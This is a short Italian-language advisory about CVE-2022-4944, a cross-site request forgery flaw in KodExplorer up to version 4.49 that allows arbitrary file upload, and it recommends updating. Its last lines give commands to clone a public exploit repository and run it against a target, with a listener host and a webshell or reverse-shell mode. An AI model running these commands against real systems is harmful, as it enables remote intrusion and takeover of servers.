
「💥」CVE-2022-4944: KodExplorer <= 4.49 - CSRF a Caricamento Arbitrario di File

Una vulnerabilità, classificata come problematica, è stata trovata in kalcaddle KodExplorer fino alla versione 4.49. Ciò riguarda una parte sconosciuta. La manipolazione porta a cross-site request forgery. Questa vulnerabilità è identificata in modo univoco come CVE-2022-4944. È possibile avviare l'attacco in remoto. Inoltre, è disponibile un exploit. Si raccomanda di aggiornare il componente interessato.

pip install requests
git clone https://github.com/Brosck/CVE-2022-4944.git
cd CVE-2022-4944
python3 CVE-2022-4944.py -u http://TARGET.TLD/KODExplorer -lh LOCALHOST -m MODE # webshell/reverse mode